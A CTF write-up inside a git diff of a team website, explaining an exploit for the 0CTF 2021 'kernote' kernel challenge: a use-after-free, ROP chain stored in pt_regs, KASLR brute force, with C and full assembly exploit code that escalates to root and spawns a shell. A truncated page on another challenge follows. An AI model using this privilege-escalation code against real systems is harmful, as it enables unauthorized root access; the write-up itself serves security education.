This is a kernel pwn challenge. The challenge uses the usual setup: a QEMU VM
+running Linux with a vulnerable module. We get an unprivileged shell in the VM
+and we have to exploit the kernel to become root and read the flag.
+
+
$ ls
+bzImage readme.md rootfs.img run.sh
+
+$ cat readme.md
+Here are some kernel config options in case you need it
+CONFIG_SLAB=y
+CONFIG_SLAB_FREELIST_RANDOM=y
+CONFIG_SLAB_FREELIST_HARDENED=y
+CONFIG_HARDENED_USERCOPY=y
+CONFIG_STATIC_USERMODEHELPER=y
+CONFIG_STATIC_USERMODEHELPER_PATH=""
+
+$ cat run.sh
+#!/bin/sh
+qemu-system-x86_64 \
+-m 128M \
+-kernel ./bzImage \
+-hda ./rootfs.img \
+-append "console=ttyS0 quiet root=/dev/sda rw init=/init oops=panic panic=1 panic_on_warn=1 kaslr pti=on" \
+-monitor /dev/null \
+-smp cores=2,threads=2 \
+-nographic \
+-cpu kvm64,+smep,+smap \
+-no-reboot \
+-snapshot
+
+
+
All the usual mitigations are enabled (SMEP, SMAP, KASLR, KPTI, …). The kernel
+also uses the SLAB allocator instead of the default SLUB and disables usermode
+helpers by hardcoding their path to “”. Furthermore the VM will shut down
+immediately if we cause any kernel warnings or panics.
+
+
rootfs.img is an ext4 disk. We can mount it to extract the files:
kptr_restrict=1 prevents us from reading kernel addresses from
+/proc/kallsyms and dmesg_restrict=1 prevents us from reading the kernel logs.
+
+
The interesting part is kernote.ko, the kernel module which contains the
+vulnerable code. My teammate busdma reverse
+engineered the module and quickly spotted some bugs. Here is the (cleaned up)
+decompilation.
The first bug is that note can point to freed memory if we set it to the address
+of a note and then free that note. The second bug is that command 0x666a
+increments the user_struct’s refcount but never decrements it. The second bug
+is useless because overflowing a refcount triggers a warning which shuts down
+the VM immediately, but the first bug looks promising. Later during the CTF the
+author of the task confirmed that the second bug was unintentional.
+
+
Command 0x666a looks like it might leak the contents of a note, but in
+practice it only does so when invoked by root and it logs the contents to dmesg,
+which we can’t access. Either way it’s not useful.
+
+
In conclusion, the bug lets us overwrite the first 8 bytes of a freed chunk in
+kmalloc-32. The challenge is to somehow use that to get root.
+
+
Exploitation
+
+
After reverse engineering the module busdma also wrote a PoC exploit that crashes
+the kernel with a controlled RIP. The PoC frees a note and reclaims the freed
+chunk with a struct seq_operations, which is heap allocated in kmalloc-32 and contains a function pointer
+in the first 8 bytes. It then uses the bug to overwrite the function pointer and
+reads from the seq file to call the overwritten pointer.
This is a great starting point but it’s not enough to own the kernel. We can’t
+directly jump to some code in userspace because of SMEP + KPTI. We also can’t
+(seemingly) start a ROP or JOP chain right away because we don’t control the
+contents of any of the registers or the memory they point to (except rax which
+contains our overwritten function pointer).
+
+
My goal at this point was to try and use our bug to get arbitrary read and write
+in the kernel.
+
+
My first idea was to overwrite a freelist pointer. By default the first 8 bytes
+of a free kmalloc chunk contain the freelist pointer and we can easily get
+arbitrary r/w by overwriting that. Unfortunately this challenge doesn’t use the
+default allocator. Instead the author enabled the older SLAB allocator which
+stores metadata out-of-line and prevents this attack.
+
+
My second idea was to corrupt the next pointer of a msg_msgseg. I had played
+corCTF about 1 month earlier and spent a lot of time failing to pwn the Fire of
+Salvation kernel challenge. That challenge let us overwrite the first 40 bytes
+of a freed chunk in kmalloc-4k, which is somewhat similar to what we have here.
+You can find the author’s writeup for that challenge here.
+We can reclaim the freed note with a 32-byte msg_msgseg, which contains a
+pointer to the next msgseg in the first 8 bytes, then hopefully use that to
+get arbitrary read and write, just like in that challenge. Unfortunately I
+couldn’t turn this into an arbitrary kernel r/w, even though I could crash the
+kernel with an arbitrary pointer dereference. The reason is that the bug doesn’t
+let us overwrite the m_ts field of msg_msg, so the kernel will stop reading
+and writing after the first msg_msgseg.
+
+
After spending hours on this idea and ultimately ruling it out I went back to
+busdma’s crash PoC and started looking for controllable memory in GDB. I
+eventually noticed that there were a lot of what looked like userspace pointers
+near the bottom of the kernel’s stack:
+
+
+
+
After looking at the system call handler for a bit it became clear that these
+are the saved userspace registers. One of the first things the system call
+handler does is to push a struct pt_regs on the stack.
+pt_regs
+contains the values of all the registers at the moment the system call was
+invoked. As far as I can tell all registers are saved on every syscall,
+despite what the comment on pt_regs says. Obviously the contents of pt_regs
+are fully controlled by userspace, minus some constraints such as that rax
+must contain the correct system call number.
At this point I had an idea: what if we could store a ROP chain in the contents
+of pt_regs? r8-r15, rbx, and rbp are ignored by the read syscall and
+can contain any value (except r11 which contains the saved rflags). This
+gives us about 80 bytes of contiguous controlled memory. Is this enough to fit
+a ROP chain that gives us root and returns to userspace without crashing? Can
+we even move the stack pointer to the beginning of the controlled area in a
+single gadget?
+
+
As luck would have it, the answer to the second question is yes! I found this
+gadget that moves the stack pointer by just the right amount when invoked from
+the overwritten seq_operations pointer:
+
+
0xffffffff81516ebe: add rsp, 0x180; mov eax, r12d; pop rbx; pop r12; pop rbp; ret;
+
+
+
But still, 80 bytes is really not a lot. Can we fit our ROP chain in so little
+space? A typical payload used to get root in kernel exploits calls
+commit_creds(prepare_kernel_cred(NULL)). Doing this uses 32 bytes in our ROP
+chain. However in addition to this we have to return to userspace cleanly, or
+we will crash the VM before we can use our newly-acquired root credentials.
+Returning to userspace takes an additional 40 bytes because we need to set rcx
+to a valid userspace address and r11 to valid flags before we can ROP to
+syscall_return_via_sysret. This comes in at 72 bytes, just below of our 80
+byte budget. We can further optimize this down to 64 bytes if we do
+commit_creds(&init_cred) instead, and skip prepare_kernel_cred. init_cred
+is the cred structure used for the init process and it’s located in the
+kernel’s data section. Our final ROP chain then looks like this:
+
+
r15: 0xffffffff81075c4c: pop rdi; ret
+r14: 0xffffffff8266b780: &init_cred
+r13: 0xffffffff810c9dd5: commit_creds
+r12: 0xffffffff810761da: pop rcx; ret
+rbp: < address of our code in userspace >
+rbx: 0xffffffff8107605a: pop r11; ret
+r11: < valid rflags value >
+r10: 0xffffffff81c00109: return from syscall
+
+
+
We need precise control over the values stored in the registers when we invoke
+the syscall handler. We need to recover our userspace stack after returning.
+This is probably possible in C but I figured I should write a helper function
+in assembly instead, to have more precise control over the registers. The
+syscall instruction already stores the current value of rflags in r11 so
+we don’t have to set that register.
Combined with the seq_operations exploit this makes us root, and we can simply
+read and print the flag or execve a shell after returning to userspace.
+
+
There is still an elephant in the room though. So far we have assumed that we
+know the address of all of these gadgets, and yet we still have absolutely no
+leaks of kernel addresses or a way to bypass KASLR.
+
+
Luckily for us even with KASLR the base address of the kernel is not very random.
+In fact there are only 512 possible addresses at which the kernel will load
+itself. This is small enough that we can brute force it in a reasonable amount
+of time. We will keep trying our exploit assuming that the kernel’s base address
+is 0xffffffff81000000 (same as if there was no KASLR) and eventually we will
+succeed. We are nearly guaranteed to succeed at least once if we run the exploit
+~2000 times. In our experiments running the exploit against the remote system
+took about 5-10 seconds. We did some napkin math and concluded that we should
+be able to get the flag in about an hour or two by running multiple instances
+of the exploit in parallel. Since we still had several hours left before the
+end of the CTF we decided to go with that. We got the flag after about an hour.
+
+
I ended up writing an optimized version of the exploit entirely in assembly to
+make it smaller and speed up the brute forcing. The target VM has no internet
+access so we have to upload the exploit through the VM’s serial port which takes
+a long time. Even when using UPX and musl, the C exploit was about 18KB. The
+exploit written in assembly is only 342 bytes when gzipped, so it uploads much
+faster.
It is pretty clear that this solution is not what the author intended, but
+it was still fun and it got us a flag which is what counts. The intended
+solution was to overwrite a freed ldt_struct. You can find the author’s own
+writeup here.
+
+
Conclusion
+
+
Thanks to busdma for the help with reversing and the initial PoC exploit and to
+my teammates for letting me bounce ideas off of them. Thanks to 0ops and eee for
+the amazing CTF, we really had a lot of fun playing this one. Looking forward
+to next year’s edition :).
+
+
I don’t know if using pt_regs as ROP chain is a new technique or not. I’ve
+never heard of it before and I couldn’t find anything on Google. It seems pretty
+powerful though: it only requires RIP control and bypasses all mitigations
+except KASLR, assuming that the kernel has the right gadgets. Let me know if
+it’s been used before somewhere.
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
diff --git a/0CTF-2021-finals/pwn/kernote.md b/0CTF-2021-finals/pwn/kernote.md
new file mode 100755
index 0000000..a61b926
--- /dev/null
+++ b/0CTF-2021-finals/pwn/kernote.md
@@ -0,0 +1,694 @@
+# Kernote
+
+**Authors:** [Nspace](https://twitter.com/_MatteoRizzo)
+
+**Tags:** pwn, kernel
+
+**Points:** 750
+
+> Let's try kernote in kernel
+>
+> nc 42.192.68.11 12345
+> [Attachment](https://attachment.ctf.0ops.sjtu.cn/kernote_3157feafdcfaf6dcfa356a04ad57a056.tar.gz)
+> or [Attachment(MEGA)](https://mega.nz/file/axoHVaTa#cl_YEcpSn3W094l65jYVKugt0DWucl1YnuDGqq_OVN4)
+
+## Analysis
+
+This is a kernel pwn challenge. The challenge uses the usual setup: a QEMU VM
+running Linux with a vulnerable module. We get an unprivileged shell in the VM
+and we have to exploit the kernel to become root and read the flag.
+
+```
+$ ls
+bzImage readme.md rootfs.img run.sh
+
+$ cat readme.md
+Here are some kernel config options in case you need it
+CONFIG_SLAB=y
+CONFIG_SLAB_FREELIST_RANDOM=y
+CONFIG_SLAB_FREELIST_HARDENED=y
+CONFIG_HARDENED_USERCOPY=y
+CONFIG_STATIC_USERMODEHELPER=y
+CONFIG_STATIC_USERMODEHELPER_PATH=""
+
+$ cat run.sh
+#!/bin/sh
+qemu-system-x86_64 \
+-m 128M \
+-kernel ./bzImage \
+-hda ./rootfs.img \
+-append "console=ttyS0 quiet root=/dev/sda rw init=/init oops=panic panic=1 panic_on_warn=1 kaslr pti=on" \
+-monitor /dev/null \
+-smp cores=2,threads=2 \
+-nographic \
+-cpu kvm64,+smep,+smap \
+-no-reboot \
+-snapshot
+```
+
+All the usual mitigations are enabled (SMEP, SMAP, KASLR, KPTI, ...). The kernel
+also uses the SLAB allocator instead of the default SLUB and disables usermode
+helpers by hardcoding their path to "". Furthermore the VM will shut down
+immediately if we cause any kernel warnings or panics.
+
+`rootfs.img` is an ext4 disk. We can mount it to extract the files:
+
+```
+$ mount -o loop rootfs.img mount
+
+$ ls mount
+bin dev etc flag init kernote.ko linuxrc lost+found proc sbin sys tmp usr
+
+$ cat mount/init
+#!/bin/sh
+mount -t proc none /proc
+mount -t sysfs none /sys
+mount -t tmpfs tmpfs /tmp
+#mount -t devtmpfs devtmpfs /dev
+mkdir /dev/pts
+mount -t devpts devpts /dev/pts
+echo /sbin/mdev>/proc/sys/kernel/hotplug
+echo 1 > /proc/sys/kernel/dmesg_restrict
+echo 1 > /proc/sys/kernel/kptr_restrict
+echo "flag{testflag}">/flag
+chmod 660 /flag
+insmod /kernote.ko
+#/sbin/mdev -s
+chmod 666 /dev/kernote
+chmod 777 /tmp
+setsid cttyhack setuidgid 1000 sh
+poweroff -f
+```
+
+`kptr_restrict=1` prevents us from reading kernel addresses from
+`/proc/kallsyms` and `dmesg_restrict=1` prevents us from reading the kernel logs.
+
+The interesting part is `kernote.ko`, the kernel module which contains the
+vulnerable code. My teammate [busdma](https://twitter.com/busdma) reverse
+engineered the module and quickly spotted some bugs. Here is the (cleaned up)
+decompilation.
+
+```c
+uint64_t *buf[16];
+uint64_t *note;
+int major_num;
+struct class *module_class;
+struct device *module_device;
+spinlock_t spin;
+
+int kernote_ioctl(struct file *f, uint32_t cmd, uint64_t arg);
+
+const struct file_operations kernote_fo = {
+ .unlocked_ioctl = kernote_ioctl,
+};
+
+int module_init(void)
+{
+ major_num = register_chrdev(0LL, "kernote", &kernote_fo);
+ if (major_num < 0) {
+ printk(KERN_INFO "[kernote] : Failed to register device\n");
+ return major_num;
+ }
+
+ module_class = class_create(THIS_MODULE, "kernote", &module_device);
+ if (IS_ERR(module_class)) {
+ unregister_chrdev(major_num, "kernote");
+ printk(KERN_INFO "[kernote] : Failed to create class\n");
+ return PTR_ERR(module_class);
+ }
+
+ module_device = device_create(module_class, NULL, MKDEV(major_num, 0), NULL, "kernote");
+ if (IS_ERR(module_device)) {
+ class_destroy(module_class);
+ unregister_chrdev(major_num, "kernote");
+ printk(KERN_INFO "[kernote] : Failed to create device\n");
+ return PTR_ERR(module_device);
+ }
+
+ printk(KERN_INFO "[kernote] : Insert module complete\n");
+ return 0;
+}
+
+int kernote_ioctl(struct file *f, uint32_t cmd, uint64_t arg)
+{
+ int ret;
+
+ raw_spin_lock(&spin);
+
+ switch (cmd) {
+ // alloc note
+ case 0x6667:
+ if (arg > 15) {
+ ret = -1;
+ break;
+ }
+
+ uint64_t *newnote = kmalloc(32, GFP_KERNEL);
+ buf[arg] = newnote;
+ if (newnote == NULL) {
+ ret == -1;
+ break;
+ }
+
+ ret = 0;
+ break;
+
+ // free note
+ case 0x6668:
+ if (arg > 15 || buf[arg] == NULL) {
+ ret = -1;
+ break;
+ }
+
+ kfree(buf[arg]);
+ buf[arg] = 0;
+ ret = 0;
+ break;
+
+ // set note pointer
+ case 0x6666:
+ if (arg > 15) {
+ ret = -1;
+ break;
+ }
+
+ note = buf[arg];
+ break;
+
+ // write note
+ case 0x6669:
+ if (note) {
+ *note = arg;
+ ret = 0;
+ } else {
+ ret = -1;
+ }
+ break;
+
+ // inc refcount?
+ case 0x666a:
+ struct user_struct *user = current_task->cred->user;
+ refcount_inc(&user->__count);
+ if (user->uid != 0) {
+ printk(KERN_INFO "[kernote] : ********\n");
+ ret = -1;
+ } else if (note != NULL) {
+ printk(KERN_INFO "[kernote] : 0x%lx\n", *note);
+ ret = 0;
+ } else {
+ printk(KERN_INFO "[kernote] : No note\n");
+ ret = -1;
+ }
+ break;
+ }
+
+ spin_unlock(&spin);
+ return ret;
+}
+```
+
+The first bug is that note can point to freed memory if we set it to the address
+of a note and then free that note. The second bug is that command `0x666a`
+increments the `user_struct`'s refcount but never decrements it. The second bug
+is useless because overflowing a refcount triggers a warning which shuts down
+the VM immediately, but the first bug looks promising. Later during the CTF the
+author of the task confirmed that the second bug was unintentional.
+
+Command `0x666a` looks like it might leak the contents of a note, but in
+practice it only does so when invoked by root and it logs the contents to dmesg,
+which we can't access. Either way it's not useful.
+
+In conclusion, the bug lets us overwrite the first 8 bytes of a freed chunk in
+kmalloc-32. The challenge is to somehow use that to get root.
+
+## Exploitation
+
+After reverse engineering the module busdma also wrote a PoC exploit that crashes
+the kernel with a controlled RIP. The PoC frees a note and reclaims the freed
+chunk with a [`struct seq_operations`](https://elixir.bootlin.com/linux/latest/source/include/linux/seq_file.h#L31), which is heap allocated in kmalloc-32 and contains a function pointer
+in the first 8 bytes. It then uses the bug to overwrite the function pointer and
+reads from the seq file to call the overwritten pointer.
+
+```c
+#define SET_NOTE 0x6666
+#define ALLOC_ENTRY 0x6667
+#define FREE_ENTRY 0x6668
+#define WRITE_NOTE 0x6669
+
+static int kfd;
+
+static int set_note(uint64_t idx)
+{
+ return ioctl(kfd, SET_NOTE, idx);
+}
+
+static int alloc_entry(uint64_t idx)
+{
+ return ioctl(kfd, ALLOC_ENTRY, idx);
+}
+
+static int free_entry(uint64_t idx)
+{
+ return ioctl(kfd, FREE_ENTRY, idx);
+}
+
+static int write_note(uint64_t val)
+{
+ return ioctl(kfd, WRITE_NOTE, val);
+}
+
+int main(void)
+{
+ kfd = open("/dev/kernote", O_RDWR);
+ assert(kfd > 0);
+
+ for (int i = 0; i < 0x100; i++) {
+ alloc_entry(0);
+ }
+ alloc_entry(1);
+ set_note(1);
+ free_entry(1);
+
+ int fd = open("/proc/self/stat", O_RDONLY);
+
+ write_note(0x4141414141414141);
+
+ char buf[32] = {};
+ read(fd, buf, sizeof(buf));
+
+ return 0;
+}
+```
+
+```
+[ 3.856543] general protection fault, probably for non-canonical address 0x4141414141414141: 0000 [#1] SMP PTI
+[ 3.858362] CPU: 0 PID: 141 Comm: pwn Tainted: G OE 5.11.9 #2
+[ 3.859598] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
+[ 3.861074] RIP: 0010:__x86_indirect_thunk_rax+0x3/0x5
+[ 3.861995] Code: 06 d7 ff 31 c0 e9 43 06 d7 ff <...>
+[ 3.865260] RSP: 0018:ffffc90000253dc0 EFLAGS: 00010246
+[ 3.866187] RAX: 4141414141414141 RBX: ffffc90000253e60 RCX: 0000000000000000
+[ 3.867440] RDX: 0000000000000000 RSI: ffff888004d47be0 RDI: ffff888004d47bb8
+[ 3.868698] RBP: ffffc90000253e18 R08: 0000000000001000 R09: ffff888003c63000
+[ 3.869960] R10: ffffc90000253e68 R11: 0000000000000000 R12: 0000000000000000
+[ 3.871217] R13: ffff888004d47bb8 R14: ffff888004d47be0 R15: ffffc90000253ef0
+[ 3.872474] FS: 0000000001e68380(0000) GS:ffff888007600000(0000) knlGS:0000000000000000
+[ 3.873898] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
+[ 3.874914] CR2: 000000000048afd0 CR3: 0000000004cca000 CR4: 00000000003006f0
+```
+
+This is a great starting point but it's not enough to own the kernel. We can't
+directly jump to some code in userspace because of SMEP + KPTI. We also can't
+(seemingly) start a ROP or JOP chain right away because we don't control the
+contents of any of the registers or the memory they point to (except rax which
+contains our overwritten function pointer).
+
+My goal at this point was to try and use our bug to get arbitrary read and write
+in the kernel.
+
+My first idea was to overwrite a freelist pointer. By default the first 8 bytes
+of a free kmalloc chunk contain the freelist pointer and we can easily get
+arbitrary r/w by overwriting that. Unfortunately this challenge doesn't use the
+default allocator. Instead the author enabled the older SLAB allocator which
+stores metadata out-of-line and prevents this attack.
+
+My second idea was to corrupt the next pointer of a `msg_msgseg`. I had played
+corCTF about 1 month earlier and spent a lot of time failing to pwn the `Fire of
+Salvation` kernel challenge. That challenge let us overwrite the first 40 bytes
+of a freed chunk in kmalloc-4k, which is somewhat similar to what we have here.
+You can find the author's writeup for that challenge [here](https://www.willsroot.io/2021/08/corctf-2021-fire-of-salvation-writeup.html).
+We can reclaim the freed note with a 32-byte `msg_msgseg`, which contains a
+pointer to the next `msgseg` in the first 8 bytes, then hopefully use that to
+get arbitrary read and write, just like in that challenge. Unfortunately I
+couldn't turn this into an arbitrary kernel r/w, even though I could crash the
+kernel with an arbitrary pointer dereference. The reason is that the bug doesn't
+let us overwrite the `m_ts` field of `msg_msg`, so the kernel will stop reading
+and writing after the first `msg_msgseg`.
+
+After spending hours on this idea and ultimately ruling it out I went back to
+busdma's crash PoC and started looking for controllable memory in GDB. I
+eventually noticed that there were a lot of what looked like userspace pointers
+near the bottom of the kernel's stack:
+
+![](kernote1.png)
+
+After looking at the system call handler for a bit it became clear that these
+are the saved userspace registers. One of the first things the system call
+handler does is to [push](https://elixir.bootlin.com/linux/v5.11.9/source/arch/x86/entry/entry_64.S#L115) a `struct pt_regs` on the stack.
+[`pt_regs`](https://elixir.bootlin.com/linux/v5.11.9/source/arch/x86/include/uapi/asm/ptrace.h#L44)
+contains the values of all the registers at the moment the system call was
+invoked. As far as I can tell all registers are [saved](https://elixir.bootlin.com/linux/v5.11.9/source/arch/x86/entry/calling.h#L100) on every syscall,
+despite what the comment on `pt_regs` says. Obviously the contents of `pt_regs`
+are fully controlled by userspace, minus some constraints such as that `rax`
+must contain the correct system call number.
+
+```c
+struct pt_regs {
+ unsigned long r15;
+ unsigned long r14;
+ unsigned long r13;
+ unsigned long r12;
+ unsigned long rbp;
+ unsigned long rbx;
+ unsigned long r11;
+ unsigned long r10;
+ unsigned long r9;
+ unsigned long r8;
+ unsigned long rax;
+ unsigned long rcx;
+ unsigned long rdx;
+ unsigned long rsi;
+ unsigned long rdi;
+ unsigned long orig_rax;
+ unsigned long rip;
+ unsigned long cs;
+ unsigned long eflags;
+ unsigned long rsp;
+ unsigned long ss;
+};
+```
+
+At this point I had an idea: what if we could store a ROP chain in the contents
+of `pt_regs`? `r8`-`r15`, `rbx`, and `rbp` are ignored by the `read` syscall and
+can contain any value (except `r11` which contains the saved `rflags`). This
+gives us about 80 bytes of contiguous controlled memory. Is this enough to fit
+a ROP chain that gives us root and returns to userspace without crashing? Can
+we even move the stack pointer to the beginning of the controlled area in a
+single gadget?
+
+As luck would have it, the answer to the second question is yes! I found this
+gadget that moves the stack pointer by just the right amount when invoked from
+the overwritten `seq_operations` pointer:
+
+```
+0xffffffff81516ebe: add rsp, 0x180; mov eax, r12d; pop rbx; pop r12; pop rbp; ret;
+```
+
+But still, 80 bytes is really not a lot. Can we fit our ROP chain in so little
+space? A typical payload used to get root in kernel exploits calls
+`commit_creds(prepare_kernel_cred(NULL))`. Doing this uses 32 bytes in our ROP
+chain. However in addition to this we have to return to userspace cleanly, or
+we will crash the VM before we can use our newly-acquired root credentials.
+Returning to userspace takes an additional 40 bytes because we need to set `rcx`
+to a valid userspace address and `r11` to valid flags before we can ROP to
+`syscall_return_via_sysret`. This comes in at 72 bytes, just below of our 80
+byte budget. We can further optimize this down to 64 bytes if we do
+`commit_creds(&init_cred)` instead, and skip `prepare_kernel_cred`. `init_cred`
+is the `cred` structure used for the init process and it's located in the
+kernel's data section. Our final ROP chain then looks like this:
+
+```
+r15: 0xffffffff81075c4c: pop rdi; ret
+r14: 0xffffffff8266b780: &init_cred
+r13: 0xffffffff810c9dd5: commit_creds
+r12: 0xffffffff810761da: pop rcx; ret
+rbp: < address of our code in userspace >
+rbx: 0xffffffff8107605a: pop r11; ret
+r11: < valid rflags value >
+r10: 0xffffffff81c00109: return from syscall
+```
+
+We need precise control over the values stored in the registers when we invoke
+the syscall handler. We need to recover our userspace stack after returning.
+This is probably possible in C but I figured I should write a helper function
+in assembly instead, to have more precise control over the registers. The
+`syscall` instruction already stores the current value of `rflags` in `r11` so
+we don't have to set that register.
+
+```x86asm
+pwn:
+ mov [user_rsp], rsp
+ mov r15, 0xffffffff81075c4c
+ mov r14, 0xffffffff8266b780
+ mov r13, 0xffffffff810c9dd5
+ mov r12, 0xffffffff810761da
+ lea rbp, [.after_syscall]
+ mov rbx, 0xffffffff8107605a
+ mov r10, 0xffffffff81c00109
+ ; SYS_read
+ xor eax, eax
+ syscall
+.after_syscall:
+ mov rsp, [user_rsp]
+ ret
+
+user_rsp: dq 0
+```
+
+Combined with the `seq_operations` exploit this makes us root, and we can simply
+read and print the flag or `execve` a shell after returning to userspace.
+
+There is still an elephant in the room though. So far we have assumed that we
+know the address of all of these gadgets, and yet we still have absolutely no
+leaks of kernel addresses or a way to bypass KASLR.
+
+Luckily for us even with KASLR the base address of the kernel is not very random.
+In fact there are only 512 possible addresses at which the kernel will load
+itself. This is small enough that we can brute force it in a reasonable amount
+of time. We will keep trying our exploit assuming that the kernel's base address
+is `0xffffffff81000000` (same as if there was no KASLR) and eventually we will
+succeed. We are nearly guaranteed to succeed at least once if we run the exploit
+~2000 times. In our experiments running the exploit against the remote system
+took about 5-10 seconds. We did some napkin math and concluded that we should
+be able to get the flag in about an hour or two by running multiple instances
+of the exploit in parallel. Since we still had several hours left before the
+end of the CTF we decided to go with that. We got the flag after about an hour.
+
+I ended up writing an optimized version of the exploit entirely in assembly to
+make it smaller and speed up the brute forcing. The target VM has no internet
+access so we have to upload the exploit through the VM's serial port which takes
+a long time. Even when using UPX and musl, the C exploit was about 18KB. The
+exploit written in assembly is only 342 bytes when gzipped, so it uploads much
+faster.
+
+```x86asm
+; Keep running this exploit until it works, which should take about 512 tries.
+; Or alternatively find a KASLR bypass :)
+
+; Emit 64-bit code.
+bits 64
+; Use RIP-relative addressing by default.
+default rel
+; Load at this address
+org 0x40000000
+
+ELFCLASS64 equ 2
+ELFDATA2LSB equ 1
+EV_CURRENT equ 1
+ELFOSABI_NONE equ 0
+ET_EXEC equ 2
+EM_X86_64 equ 62
+PT_LOAD equ 1
+PF_X equ 1
+PF_W equ 2
+PF_R equ 4
+O_RDONLY equ 0
+O_RDWR equ 2
+
+; 64-bit ELF header.
+elfh:
+; e_ident
+db 0x7f, 'ELF', ELFCLASS64, ELFDATA2LSB, EV_CURRENT, ELFOSABI_NONE, 0, 0, 0, 0, 0, 0, 0, 0
+; e_type
+dw ET_EXEC
+; e_machine
+dw EM_X86_64
+; e_version
+dd EV_CURRENT
+; e_entry
+dq _start
+; e_phoff
+dq phdr - $$
+; e_shoff
+dq 0
+; e_flags
+dd 0
+; e_ehsize
+dw ehsize
+; e_phentsize
+dw phsize
+; e_phnum
+dw 1
+; e_shentsize
+dw 0
+; e_shnum
+dw 0
+; e_shstrndx
+dw 0
+
+; Size of the elf header.
+ehsize equ $ - elfh
+
+; 64-bit program header.
+phdr:
+; p_type;
+dd PT_LOAD
+; p_flags;
+dd PF_R | PF_W | PF_X
+; p_offset;
+dq 0
+; p_vaddr;
+dq $$
+; p_paddr;
+dq $$
+; p_filesz;
+dq filesize
+; p_memsz;
+dq filesize
+; p_align;
+dq 0x1000
+
+phsize equ $ - phdr
+
+exit:
+ mov eax, 60
+ syscall
+ ud2
+
+open:
+ mov eax, 2
+ syscall
+ ret
+
+ioctl:
+ mov eax, 16
+ syscall
+ ret
+
+execve:
+ mov eax, 59
+ syscall
+ ud2
+
+set_note:
+ mov edx, edi
+ mov edi, [kfd]
+ mov esi, 0x6666
+ jmp ioctl
+
+alloc_entry:
+ mov edx, edi
+ mov edi, [kfd]
+ mov esi, 0x6667
+ jmp ioctl
+
+free_entry:
+ mov edx, edi
+ mov edi, [kfd]
+ mov esi, 0x6668
+ jmp ioctl
+
+write_note:
+ mov rdx, rdi
+ mov edi, [kfd]
+ mov esi, 0x6669
+ jmp ioctl
+
+pwn:
+ mov [user_rsp], rsp
+ ; 0xffffffff81075c4c: pop rdi; ret
+ mov r15, 0xffffffff81075c4c
+ ; 0xffffffff8266b780: init_cred
+ mov r14, 0xffffffff8266b780
+ ; 0xffffffff810c9dd5: commit_creds
+ mov r13, 0xffffffff810c9dd5
+ ; 0xffffffff810761da: pop rcx; ret
+ mov r12, 0xffffffff810761da
+ lea rbp, [.after_syscall]
+ ; 0xffffffff8107605a: pop r11; ret
+ mov rbx, 0xffffffff8107605a
+ ; 0xffffffff81c00109: return from syscall
+ mov r10, 0xffffffff81c00109
+ xor eax, eax
+ syscall
+.after_syscall:
+ mov rsp, [user_rsp]
+ ret
+
+_start:
+ ; kfd = open("/dev/kernote", O_RDWR)
+ lea rdi, [devpath]
+ mov esi, O_RDWR
+ call open
+ mov [kfd], eax
+
+ ; for (int i = 0; i < 0x100; i++) {
+ ; alloc_entry(0);
+ ; }
+ mov r8d, 0x100
+.sprayloop:
+ xor edi, edi
+ call alloc_entry
+ dec r8d
+ jnz .sprayloop
+
+ ; alloc_entry(1)
+ mov edi, 1
+ call alloc_entry
+ ; set_note(1)
+ mov edi, 1
+ call set_note
+ ; free_entry(1)
+ mov edi, 1
+ call free_entry
+
+ ; statfd = open("/proc/self/stat", O_RDONLY)
+ lea rdi, [statpath]
+ mov esi, O_RDONLY
+ call open
+ mov [statfd], eax
+
+ ; 0xffffffff81516ebe: add rsp, 0x180; mov eax, r12d; pop rbx; pop r12; pop rbp; ret;
+ ; write_note(0xffffffff81516ebe)
+ mov rdi, 0xffffffff81516ebe
+ call write_note
+
+ ; pwn(statfd, buf, sizeof(buf))
+ mov edi, [statfd]
+ lea rsi, [buf]
+ mov edx, bufsize
+ call pwn
+
+ ; execve("/bin/sh", {"/bin/sh", NULL}, NULL)
+ lea rdi, [shell_path]
+ lea rsi, [shell_argv]
+ xor edx, edx
+ jmp execve
+
+user_rsp: dq 0
+kfd: dd 0
+statfd: dd 0
+shell_argv: dq shell_path, 0
+buf: times 32 db 0
+bufsize equ $ - buf
+
+devpath: db '/dev/kernote', 0
+statpath: db '/proc/self/stat', 0
+shell_path: db '/bin/sh', 0
+
+filesize equ $ - $$
+```
+
+```
+flag{LMm2tayzwWEzGpnmoyyf8zoTmk6X5TQrL45o}
+```
+
+## Intended solution
+
+It is pretty clear that this solution is not what the author intended, but
+it was still fun and it got us a flag which is what counts. The intended
+solution was to overwrite a freed `ldt_struct`. You can find the author's own
+writeup [here](https://github.com/YZloser/My-CTF-Challenges/tree/master/0ctf-2021-final/kernote).
+
+## Conclusion
+
+Thanks to busdma for the help with reversing and the initial PoC exploit and to
+my teammates for letting me bounce ideas off of them. Thanks to 0ops and eee for
+the amazing CTF, we really had a lot of fun playing this one. Looking forward
+to next year's edition :).
+
+I don't know if using `pt_regs` as ROP chain is a new technique or not. I've
+never heard of it before and I couldn't find anything on Google. It seems pretty
+powerful though: it only requires RIP control and bypasses all mitigations
+except KASLR, assuming that the kernel has the right gadgets. Let me know if
+it's been used before somewhere.
\ No newline at end of file
diff --git a/0CTF-2021-finals/pwn/kernote1.png b/0CTF-2021-finals/pwn/kernote1.png
new file mode 100755
index 0000000..fe70a72
Binary files /dev/null and b/0CTF-2021-finals/pwn/kernote1.png differ
diff --git a/0CTF-2021/index.html b/0CTF-2021/index.html
new file mode 100755
index 0000000..4eda8c0
--- /dev/null
+++ b/0CTF-2021/index.html
@@ -0,0 +1,216 @@
+
+
+
+
+
+0CTF/TCTF 2021 Quals | Organisers
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
Only a netcat connection as description for a rev challenge, off to a good start I see. After connecting and solving the POW1, we receive the following:
+
+
[1/3]
+Here is your challenge:
+
+f0VMRgIBAQAAAAAAAAAAAAIAPgAB...
+
+Plz beat me in 10 seconds X3 :)
+
+
+
So it seems that this is a twist on the old automatic exploitation challenge :).
+I wrote a quick script to collect as many samples as possible, thinking that maybe they were just cycling a few different binaries:
I also noticed that the strings must be encrypted, because one of the functions was doing a sprintf without any format specifiers in a weird looking string:
Turns out the strings were not so useful after all, they are just used for anti debugging. Basically, the binary checks whether the command line is one of gdb, strace, ltrace or linux_server64, and if yes, enters infinite recursion.
+
+
However, I also found another interesting looking init function:
